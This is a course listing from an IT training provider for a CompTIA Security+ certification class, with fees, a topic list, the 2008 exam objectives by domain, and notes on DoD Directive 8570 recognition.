CompTIA Security+ Certification


ZNET-017 Essentials for CompTIA Security+ Certification (32 hours)CompTIA Logo
Fee: $829 includes textbook and practice exams
or $xxx also includes one certification exam voucher
Check out Our Free Retake Policy for IT Certification Programs

Call for 2013 Schedule December TBA


Free Information Session
We Will Explore Your IT Training and Certification Options
Call for an appointment to talk with one of our Technology Expert

Course DescriptionCompTIA Security+ Logo

The CompTIA Security+ Certification is a vendor neutral credential. The Security+ exam is an internationally recognized validation of foundation-level security skills and knowledge, and is used by organizations and security professionals around the globe.

This certification program helps prepare students for the CompTIA Security+ IT certification exam. Students will learn about IT industry-wide security topics, including communication security, infrastructure security, cryptography, access control, authentication, external attack, and operational and organization security. Other topics included in this course are protocols used in Linux, UNIX, and Windows in addition to the TCP/IP suite component protocols, and Ethernet operations. Students will gain knowledge in capturing, analyzing, and generating IP traffic, how to exploit protocol weaknesses and examine defensive solutions. Packet filtering, password policies, and file integrity checking are also covered. Skills Measured

This course examines and covers the following topics:
  • Network perimeter security and elements of an effective security policy.

  • Encryption, including the three main encryption methods used in internetworking.

  • Universal guidelines and principles for effective network security, as well as guidelines to create effective specific solutions.

  • Security principles and security attack identification.

  • Firewall types and common firewall terminology.

  • Firewall system planning including levels of protection.

  • Network firewall deployment.

  • Network security including industry security evaluation criteria and guidelines used to determine three security levels.

  • Mechanisms used to implement security systems, tools to evaluate key security parameters, techniques for security accounts, and threats to Windows and UNIX systems.

  • Permissions identification, assignment and usage, system defaults, and security commands.

  • System patches and fixes including application of system patches.

  • Windows 2000 Registry modifications, including lockdown and removal of services for effective security in Windows 2000 and Linux.

  • Security auditing principles, security auditor's chief duties and network risk factor assessment.

  • Security auditing and discovery processes, audit plans, and network-based and host-based discovery software.

  • Penetration strategies and methods, including identification of potential attacks.

  • User activities baseline, log analysis, and auditing of various activities.

  • Security policy compliance and assessment reports.

  • Operating system add-ons, including personal firewalls and native auditing.

  • Identifying threats to, and protecting wireless networks

Prerequisites

It is recommended that the students for this course have the knowledge
and skills equivalent of the  CompTIA Network+ Certification.

Other Certifications or equivalent Knowledge that would be beneficial:


CompTIA Security+ (2008) Objectives

CompTIA Security+ (2008) Objectives - Printer Friendly version (PDF File)

The table below lists the domain areas measured by this examination and the approximate extent to which they are represented in the examination:

Domain % of Examination
1.0 System Security 21%
2.0 Network Infrastructure 20%
3.0 Access Control 17%
4.0 Assessment & Audits 15%
5.0 Cryptography 15%
6.0 Organizational Security 12%
  Total 100%

**Note: The lists of examples provided in bulleted format below each objective are not exhaustive lists. Other examples of technologies, processes or tasks pertaining to each objective may also be included on the exam although not listed or covered in this objectives document.

1.0 Systems SecurityCompTIA Security+ Logo

1.1 Differentiate among various systems security threats.

  • Privilege escalation
  • Virus
  • Worm
  • Trojan
  • Spyware
  • Spam
  • Adware
  • Rootkits
  • Botnets
  • Logic bomb

1.2 Explain the security risks pertaining to system hardware and peripherals.

  • BIOS
  • USB devices
  • Cell phones
  • Removable storage
  • Network attached storage

1.3 Implement OS hardening practices and procedures to achieve workstation and server security.

  • Hotfixes
  • Service packs
  • Patches
  • Patch management
  • Group policies
  • Security templates
  • Configuration baselines

1.4 Carry out the appropriate procedures to establish application security.

  • ActiveX
  • Java
  • Scripting
  • Browser
  • Buffer overflows
  • Cookies
  • SMTP open relays
  • Instant messaging
  • P2P
  • Input validation
  • Cross-site scripting (XSS)

1.5 Implement security applications.

  • HIDS
  • Personal software firewalls
  • Antivirus
  • Anti-spam
  • Popup blockers

1.6 Explain the purpose and application of virtualization technology.

2.0 Network Infrastructure

2.1 Differentiate between the different ports & protocols, their respective threats and mitigation techniques.

  • Antiquated protocols
  • TCP/IP hijacking
  • Null sessions
  • Spoofing
  • Man-in-the-middle
  • Replay
  • DOS
  • DDOS
  • Domain Name Kiting
  • DNS poisoning
  • ARP poisoning

2.2 Distinguish between network design elements and components.

  • DMZ
  • VLAN
  • NAT
  • Network interconnections
  • NAC
  • Subnetting
  • Telephony

2.3 Determine the appropriate use of network security tools to facilitate network security.

  • NIDS
  • NIPS
  • Firewalls
  • Proxy servers
  • Honeypot
  • Internet content filters
  • Protocol analyzers

2.4 Apply the appropriate network tools to facilitate network security.

  • NIDS
  • Firewalls
  • Proxy servers
  • Internet content filters
  • Protocol analyzers

2.5 Explain the vulnerabilities and mitigations associated with network devices.

  • Privilege escalation
  • Weak passwords
  • Back doors
  • Default accounts
  • DOS

2.6 Explain the vulnerabilities and mitigations associated with various transmission media.

  • Vampire taps

2.7 Explain the vulnerabilities and implement mitigations associated with wireless networking.

  • Data emanation
  • War driving
  • SSID broadcast
  • Blue jacking
  • Bluesnarfing
  • Rogue access points
  • Weak encryption

3.0 Access Control

3.1 Identify and apply industry best practices for access control methods.

  • Implicit deny
  • Least privilege
  • Separation of duties
  • Job rotation

3.2 Explain common access control models and the differences between each.

  • MAC
  • DAC
  • Role & Rule based access control

3.3 Organize users and computers into appropriate security groups and roles while distinguishing between appropriate rights and privileges.

3.4 Apply appropriate security controls to file and print resources.

3.5 Compare and implement logical access control methods.

  • ACL
  • Group policies
  • Password policy
  • Domain password policy
  • User names and passwords
  • Time of day restrictions
  • Account expiration
  • Logical tokens

3.6 Summarize the various authentication models and identify the components of each.

  • One, two and three-factor authentication
  • Single sign-on

3.7 Deploy various authentication models and identify the components of each.

  • Biometric reader
  • RADIUS
  • RAS
  • LDAP
  • Remote access policies
  • Remote authentication
  • VPN
  • Kerberos
  • CHAP
  • PAP
  • Mutual
  • 802.1x
  • TACACS

3.8 Explain the difference between identification and authentication (identity proofing).

3.9 Explain and apply physical access security methods.

  • Physical access logs/lists
  • Hardware locks
  • Physical access control – ID badges
  • Door access systems
  • Man-trap
  • Physical tokens
  • Video surveillance – camera types and positioning

4.0 Assessments & Audits

4.1 Conduct risk assessments and implement risk mitigation.

4.2 Carry out vulnerability assessments using common tools.

  • Port scanners
  • Vulnerability scanners
  • Protocol analyzers
  • OVAL
  • Password crackers
  • Network mappers

4.3 Within the realm of vulnerability assessments, explain the use of penetration testing versus vulnerability scanning.

4.4 Use monitoring tools on systems and networks and detect security-related anomalies.

  • Performance monitor
  • Systems monitor
  • Performance baseline
  • Protocol analyzers

4.5 Compare and contrast various types of monitoring methodologies.

  • Behavior-based
  • Signature-based
  • Anomaly-based

4.6 Execute proper logging procedures and evaluate the results.

  • Security application
  • DNS
  • System
  • Performance
  • Access
  • Firewall
  • Antivirus

4.7 Conduct periodic audits of system security settings.

  • User access and rights review
  • Storage and retention policies
  • Group policies

5.0 Cryptography

5.1 Explain general cryptography concepts.

  • Key management
  • Steganography
  • Symmetric key
  • Asymmetric key
  • Confidentiality
  • Integrity and availability
  • Non-repudiation
  • Comparative strength of algorithms
  • Digital signatures
  • Whole disk encryption
  • Trusted Platform Module (TPM)
  • Single vs. Dual sided certificates
  • Use of proven technologies

5.2 Explain basic hashing concepts and map various algorithms to appropriate applications.

  • SHA
  • MD5
  • LANMAN
  • NTLM

5.3 Explain basic encryption concepts and map various algorithms to appropriate applications.

  • DES
  • 3DES
  • RSA
  • PGP
  • Elliptic curve
  • AES
  • AES256
  • One time pad
  • Transmission encryption (WEP TKIP, etc)

5.4 Explain and implement protocols.

  • SSL/TLS
  • S/MIME
  • PPTP
  • HTTP vs. HTTPS vs. SHTTP
  • L2TP
  • IPSEC
  • SSH

5.5 Explain core concepts of public key cryptography.

  • Public Key Infrastructure (PKI)
  • Recovery agent
  • Public key
  • Private keys
  • Certificate Authority (CA)
  • Registration
  • Key escrow
  • Certificate Revocation List (CRL)
  • Trust models

5.6 Implement PKI and certificate management.

  • Public Key Infrastructure (PKI)
  • Recovery agent
  • Public key
  • Private keys
  • Certificate Authority (CA)
  • Registration
  • Key escrow
  • Certificate Revocation List (CRL)

6.0 Organizational Security

6.1 Explain redundancy planning and its components.

  • Hot site
  • Cold site
  • Warm site
  • Backup generator
  • Single point of failure
  • RAID
  • Spare parts
  • Redundant servers
  • Redundant ISP
  • UPS
  • Redundant connections

6.2 Implement disaster recovery procedures.

  • Planning
  • Disaster recovery exercises
  • Backup techniques and practices – storage
  • Schemes
  • Restoration

6.3 Differentiate between and execute appropriate incident response procedures.

  • Forensics
  • Chain of custody
  • First responders
  • Damage and loss control
  • Reporting – disclosure of

6.4 Identify and explain applicable legislation and organizational policies.

  • Secure disposal of computers
  • Acceptable use policies
  • Password complexity
  • Change management
  • Classification of information
  • Mandatory vacations
  • Personally Identifiable Information (PII)
  • Due care
  • Due diligence
  • Due process
  • SLA
  • Security-related HR policy
  • User education and awareness training

6.5 Explain the importance of environmental controls.

  • Fire suppression
  • HVAC
  • Shielding

6.6 Explain the concept of and how to reduce the risks of social engineering.

  • Phishing
  • Hoaxes
  • Shoulder surfing
  • Dumpster diving
  • User education and awareness training

Approved for DOD Information Assurance Directive 8570.1

Directive 8570 is a policy from the Department of Defense’s Information Assurance Workforce Improvement Program that requires any DoD employee and any contractor working with the DoD to possess certain Information Assurance training and certifications. The Directive makes certain that Information Assurance personnel meet training and certification requirements related to their IT security job functions via annual metrics reporting of their workforce.

The goal of the Directive is a uniform, professional Information Assurance workforce with the knowledge and skills to effectively prevent and respond to attacks against DoD information, information systems and information infrastructures. The efforts of this program and Directive 8570 will enable the DoD to properly place Information Assurance personnel according to their skills.  (Source: www.isaca.org)

The U.S. Department of Defense recognizes CompTIA certifications in its technical and management tracks for information assurance technicians and managers under DoD Directive 8570.1M.  Currently STCC offers instructor -led courses for CompTIA A+ and Network+ Certification, and web-based courses for CompTIA Security+.  Potential employees as well as current employees or IT contractors must meet the requirements of the Directive to be employed.


Industry Acceptance

CompTIA Security+ certification is widely recognized in the industry.

Olympus Security Group requires Security+ for all of their consultants along with a growing number of companies and agencies, including:

  • Sun Microsystems

  • IBM/Tivoli Software Group

  • Symantec

  • Motorola.

  • Microsoft

Get your career on the fast track with CompTIA Security+ certification and establish your credibility as a Security professional.

     


Go To Top of Page